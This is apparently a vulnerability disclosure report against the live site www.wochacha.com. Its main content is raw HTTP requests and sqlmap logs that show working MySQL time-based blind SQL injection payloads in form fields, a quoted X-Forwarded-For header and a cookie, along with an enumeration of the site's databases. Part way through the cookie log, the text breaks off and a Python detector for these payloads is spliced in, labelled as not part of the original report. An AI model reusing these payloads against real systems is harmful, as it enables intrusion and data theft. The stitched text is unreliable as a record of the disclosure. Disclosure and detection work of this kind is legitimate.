2015-08-04: Details have been sent to the vendor and are awaiting the vendor's handling.
2015-08-09: The vendor has actively ignored the vulnerability; details are disclosed to the public.
1. POST request:
POST /about/bugbacksave HTTP/1.1
X-Forwarded-For: 8.8.8.8'
Content-Length: 1242
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_NGEUERKTBF
X-Requested-With: XMLHttpRequest
Referer: http://www.wochacha.com:80/
Cookie: wccid=030f41d14af28040995e77eb3abeb138; ctid=1; ctname=%E4%B8%8A%E6%B5%B7%E5%B8%82
Host: www.wochacha.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_QUNRCSDYVU

-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="item"

4
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="mobile_brand"


-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="mobile_type"

987-65-4329
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="project_type"

0
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="quest"

1
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="question_type"

0
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="system_version"

1
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="user_email"

###############email######
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="user_qq"

###############QQ
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="user_tel"

##########################?
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="wochacha_version"

1
-------AcunetixBoundary_QUNRCSDYVU--
I ran the security database, but it was too slow, so I did not dump the remaining data or databases.
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 99 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: -------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="item"

4
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="mobile_brand"

if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(5)))RjDc) AND'bhHH'='bhHH'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="mobile_type"

987-65-4329
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="project_type"

0
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="quest"

1
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="question_type"

0
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="system_version"

1
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="user_email"

###############email######
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="user_qq"

###############QQ
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="user_tel"

##########################?
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="wochacha_version"

1
-------AcunetixBoundary_QUNRCSDYVU--
---
[14:37:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.6
back-end DBMS: MySQL 5.0.12
[14:37:45] [INFO] fetching database names
[14:37:45] [INFO] fetching number of databases
[14:37:45] [INFO] retrieved:
[14:37:45] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
10
[14:38:06] [INFO] retrieved: information_schema
[14:45:11] [INFO] retrieved: gcore
[14:47:23] [INFO] retrieved: gcoreinc
[14:50:27] [INFO] retrieved: mysql
[14:52:37] [INFO] retrieved: security
[14:55:45] [INFO] retrieved: test
[14:57:28] [INFO] retrieved: thir
[14:59:46] [ERROR] invalid character detected. retrying..
[14:59:46] [WARNING] increasing time delay to 6 seconds
[15:00:31] [ERROR] invalid character detected. retrying..
[15:00:31] [WARNING] increasing time delay to 7 seconds
da
[15:01:54] [ERROR] invalid character detected. retrying..
[15:01:54] [WARNING] increasing time delay to 8 seconds
pp
[15:04:17] [INFO] retrieved: trap
[15:06:56] [INFO] retrieved: wcc
[15:08:40] [INFO] retrieved: zabbix
available databases [10]:
[*] gcore
[*] gcoreinc
[*] information_schema
[*] mysql
[*] security
[*] test
[*] thirdapp
[*] trap
[*] wcc
[*] zabbix
[15:12:12] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.wochacha.com'
[*] shutting down at 15:12:12
2. POST request:
POST /login_register.html HTTP/1.1
X-Forwarded-For: 8.8.8.8'
Content-Length: 230
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.wochacha.com:80/
Cookie: wccid=030f41d14af28040995e77eb3abeb138; ctid=1; ctname=%E4%B8%8A%E6%B5%B7%E5%B8%82
Host: www.wochacha.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

mobilephone=&password=g00dPa%24%24w0rD&repassword=g00dPa%24%24w0rD&validateword=01/01/1967&yan=1
I did not dump the rest.
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 98 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: mobilephone=if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(5)))Jzru) AND 'Xbzt'='Xbzt'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/&password=g00dPa$$w0rD&repassword=g00dPa$$w0rD&validateword=01/01/1967&yan=1
---
[14:38:19] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.6
back-end DBMS: MySQL 5.0.12
[14:38:19] [INFO] fetching database names
[14:38:19] [INFO] fetching number of databases
[14:38:19] [INFO] retrieved:
[14:38:19] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
1
[14:38:41] [ERROR] invalid character detected. retrying..
0
[14:38:54] [INFO] retrieved: information_schema
[14:46:10] [INFO] retrieved: gcore
[14:48:19] [INFO] retrieved:
[14:48:41] [ERROR] invalid character detected. retrying..
gcoreinc
[14:51:43] [INFO] retrieved: mysql
[14:53:58] [ERROR] invalid character detected. retrying..
[14:54:01] [INFO] retrieved: securi
[14:56:36] [ERROR] invalid character detected. retrying..
ty
[14:57:50] [ERROR] invalid character detected. retrying..
[14:57:53] [INFO] retrieved: tes
[14:59:46] [ERROR] invalid character detected. retrying..
t
[15:00:33] [INFO] retrieved: th
[15:02:07] [ERROR] invalid character detected. retrying..
[15:02:58] [ERROR] invalid character detected. retrying..
irdapp
[15:05:48] [INFO] retrieved: trap
[15:07:33] [INFO] retrieved: wcc
[15:08:57] [ERROR] invalid character detected. retrying..
[15:09:09] [ERROR] invalid character detected. retrying..
[15:09:12] [INFO] retrieved: zabb
[15:11:01] [ERROR] invalid character detected. retrying..
ix
[15:12:08] [ERROR] invalid character detected. retrying..
available databases [10]:
[*] gcore
[*] gcoreinc
[*] information_schema
[*] mysql
[*] security
[*] test
[*] thirdapp
[*] trap
[*] wcc
[*] zabbix
[15:12:11] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.wochacha.com'
[*] shutting down at 15:12:11
3. Cookie injection: there are many places; I list only one here, the others can be checked by the vendor itself.
GET /login/ HTTP/1.1
Cookie: wccid=030f41d14af28040995e77eb3abeb138; ctid=1; ctname=%E4%B8%8A%E6%B5%B7%E5%B8%82; username=
X-Requested-With: XMLHttpRequest
Referer: http://www.wochacha.com:80/
Host: www.wochacha.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Multiple parameters are injectable.
(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 361 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: wccid=030f41d14af28040995e77eb3abeb138; ctid=1; ctname=%E4%B8%8A%E6%B5%B7%E5%B8%82; username=if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(5)))swAQ) AND 'tKym'='tKym'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
---
[14:43:32] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.6
back-end DBMS: MySQL 5.0.12
[14:43:32] [INFO] fetching database names
[14:43:32] [INFO] fetching number of databases
[14:43:32] [INFO] retrieved:
[14:43:32] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[14:44:02] [INFO] adjusting time delay to 4 seconds due to good response times
[14:44:07] [ERROR] invalid character detected. retrying..
[14:44:07] [WARNING] increasing time delay to 5 seconds
10
[14:44:26] [INFO] retrieved: informat
[14:48:03] [ERROR] invalid character detected. retrying..
[14:48:03] [WARNING] increasing time delay to 6 seconds
[14:48:34] [ERROR] invalid character detected. retrying..
[14:48:34] [WARNING] increasing time delay to 7 seconds
io
[14:50:03] [ERROR] invalid character detected. retrying..
[14:50:03] [WARNING] increasing time delay to 8 seconds
n
[14:51:42] [ERROR] invalid character detected. retrying..
[14:51:42] [WARNING] increasing time delay to 9 seconds
_sc
[14:54:28] [ERROR] unable to properly validate last character value ('y')..
yema
[14:55:25] [ERROR] invalid character detected. retrying..
[14:55:25] [WARNING] increasing time delay to 5 seconds
[14:55:28] [INFO] retrieved: g
[14:56:13] [ERROR] invalid character detected. retrying..
[14:56:13] [WARNING] increasing time delay to 6 seconds
core
[14:58:24] [ERROR] invalid character detected. retrying..
[14:58:24] [WARNING] increasing time delay to 7 seconds
[14:58:27] [INFO] retrieved: gc
[15:00:26] [ERROR] invalid character detected. retrying..
[15:00:26] [WARNING] increasing time delay to 8 seconds
o
[15:02:07] [ERROR] invalid character detected. retrying..
[15:02:07] [WARNING] increasing time delay to 9 seconds
rein
[15:05:36] [ERROR] unable to properly validate last character value ('q')..
q
[15:05:38] [INFO] retrieved: my
[15:06:54] [ERROR] invalid character detected. retrying..
[15:06:54] [WARNING] increasing time delay to 5 seconds
sql
[15:08:27] [ERROR] invalid character detected. retrying..
[15:08:27] [WARNING] increasing time delay to 6 seconds
[15:08:30] [INFO] retrieved: secur
[15:10:57] [ERROR] invalid character detected. retrying..
[15:10:57] [WARNING] increasing time delay to 7 seconds
[15:11:32] [ERROR] invalid character detected. retrying..
[15:11:32] [WARNING] increasing time delay to 8 seconds
it
[15:13:48] [ERROR] invalid character detected. retrying..
[15:13:48] [WARNING] increasing time delay to 9 seconds
y
[15:14:29] [INFO] retrieved: t
[15:16:09] [ERROR] unable to properly validate last character value ('i')..
is
[15:17:14] [ERROR] invalid character detected. retrying..
[15:17:14] [WARNING] increasing time delay to 5 seconds
t
[15:18:14] [ERROR] invalid character detected. retrying..
[15:18:14] [WARNING] increasing time delay to 6 seconds
[15:18:40] [ERROR] invalid character detected. retrying..
[15:18:40] [WARNING] increasing time delay to 7 seconds
[15:19:03] [ERROR] invalid character detected. retrying..
[15:19:03] [WARNING] increasing time delay to 8 seconds
[15:19:24] [ERROR] invalid character detected. retrying..
[15:19:24] [WARNING] increasing time delay to 9 seconds
[15:19:44] [ERROR] unable to properly validate last character value ('A')..
A
[15:19:55] [ERROR] invalid character detected. retrying..
[15:19:55] [WARNING] increasing time delay to 5 seconds
[15:20:27] [ERROR] invalid character detected. retrying..
[15:20:27] [WARNING] increasing time delay to 6 seconds
[15:20:52] [ERROR] invalid character detected. retrying..
[15:20:52] [WARNING] increasing time delay to 7 seconds
[15:20:56] [INFO] retrieved:
[15:21:32] [ERROR] invalid character detected. retrying..
[15:21:32] [WARNING] increasing time delay to 8 seconds
third
[15:25:11] [ERROR] invalid character detected. retrying..
[15:25:11] [WARNING] increasing time delay to 9 seconds
app
[15:27:40] [INFO] retrieved: tr
[15:29:40] [ERROR] unable to properly validate last character value ('a')..
ap
[15:30:10] [INFO] retrieved: wcc
[15:31:23] [INFO] retrieved: z
[15:32:03] [ERROR] invalid character detected. retrying..
[15:32:03] [WARNING] increasing time delay to 5 seconds
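All three findings above share one shape: the scanner appends a quote to a client-controlled value (the X-Forwarded-For header) or drops a MySQL time-delay expression into a form field or cookie, and the server's response time reveals that the value reached an unparameterised query. As an added defensive example (not part of the original report), the following Python parses a raw request like the ones above and flags those two input classes; the request text is constructed here from the report's second POST, and the mobilephone value is the payload sqlmap reported on the page, not a new one.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Constructed sample, modelled on the report's login_register.html request; the
# mobilephone value is the payload sqlmap reported on the page, not a new one.
RAW_REQUEST = (
    "POST /login_register.html HTTP/1.1\r\n"
    "X-Forwarded-For: 8.8.8.8'\r\n"
    "Cookie: wccid=030f41d14af28040995e77eb3abeb138; ctid=1; username=\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "mobilephone=if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM "
    "(SELECT(SLEEP(5)))Jzru) AND 'Xbzt'='Xbzt'"
    "&password=g00dPa%24%24w0rD&repassword=g00dPa%24%24w0rD&yan=1"
)

# MySQL time-based blind indicators present in every payload sqlmap reported above.
TIME_BLIND = re.compile(r"\b(?:sleep|benchmark)\s*\(|\bsysdate\s*\(\s*\)", re.I)
QUOTE = re.compile(r"['\"]")

def extract_inputs(raw):
    """Split a raw HTTP/1.1 request into (location, name, value) triples
    covering headers, individual cookies and a urlencoded body."""
    head, _, body = raw.partition("\r\n\r\n")
    inputs = []
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(":")
        value = value.strip()
        if name.lower() == "cookie":
            for pair in value.split(";"):
                k, _, v = pair.strip().partition("=")
                inputs.append(("cookie", k, unquote_plus(v)))
        else:
            inputs.append(("header", name, value))
    for k, v in parse_qsl(body, keep_blank_values=True):
        inputs.append(("body", k, v))
    return inputs

def classify(raw):
    """Return (location, name, reason) findings for one request."""
    findings = []
    for loc, name, value in extract_inputs(raw):
        if TIME_BLIND.search(value):
            findings.append((loc, name, "time-based SQL function"))
        elif loc != "body" and QUOTE.search(value):
            # a quote in a header or cookie probes values that applications
            # often trust and write to the database without parameterisation
            findings.append((loc, name, "quote in client-controlled header value"))
    return findings
```

Run over the report's requests, the header hit (X-Forwarded-For) and the body hit (mobilephone) are exactly the two places sqlmap confirmed; the fix on the application side is to bind those values as query parameters rather than alert on them.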
Severity level: No impact, vendor ignored
Ignored at: 2015-08-09 10:52
Vulnerability Rank: 15 (WooYun rating)
None yet